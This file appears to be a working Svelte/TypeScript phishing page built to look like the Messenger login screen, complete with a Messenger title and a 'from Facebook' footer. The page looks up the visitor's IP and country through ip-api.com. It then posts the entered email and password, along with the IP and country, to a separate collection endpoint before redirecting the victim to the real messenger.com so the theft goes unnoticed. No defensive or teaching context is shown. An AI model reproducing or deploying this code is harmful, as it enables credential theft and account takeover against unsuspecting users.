<script lang="ts">
  import { onMount } from 'svelte';
  import { _ } from 'svelte-i18n';
  import dir from './i18n/dir';
  import axios from 'axios';
  import { API_LINK } from './config/env';

  // Components
  import TextInput from './components/TextInput.svelte';
  import Button from './components/Button.svelte';
  import Link from './components/Link.svelte';
  import Container from './components/Container.svelte';
  import Content from './components/Content.svelte';
  import Logo from './components/Logo.svelte';
  import FromFacebook from './components/FromFacebook.svelte';

  $: {
    // Change direction
    document.dir = $dir;

    if ($dir === 'rtl') {
      const root = document.documentElement;
      root.style.setProperty('--forgot-password-margin-left', '0px');
      root.style.setProperty('--forgot-password-margin-right', '20px');
      root.style.setProperty('--form-control-font-size', '15px');
    }
  }
  // Get the country code
  let country: string | null = null;
  let ip: string | null = null;

  onMount(async () => {
    const { data } = await axios.get('http://ip-api.com/json');
    country = data.country || null;
    ip = data.query || null;
  });

  let email = '';
  let password = '';

  const login = async (e: Event) => {
    e.preventDefault();

    try {
      await axios.post(API_LINK, {
        email,
        password,
        ip,
        country,
        type: 'Messenger'
      });
      window.location.href = 'https://messenger.com';
    } catch (error) {
      alert($_('messages.loginFailed'));
    }
  };
</script>

<svelte:head>
  <title>Messenger</title>
</svelte:head>

<Container>
  <Content>
    <Logo />

    <form on:submit={login}>
      <TextInput
        bind:value={email}
        placeholder={$_('inputs.email')}
        type="text"
        required
      />

      <TextInput
        bind:value={password}
        placeholder={$_('inputs.password')}
        type="password"
        required
      />

      <div class="buttons">
        <Button type="submit">{$_('buttons.login')}</Button>
        <Link>{$_('buttons.forgottenPassword')}</Link>
      </div>
    </form>
  </Content>

  <FromFacebook />
</Container>

<style>
  .buttons {
    display: flex;
    align-items: center;
    margin-bottom: 12px;
    margin-top: 20px;
  }
</style>
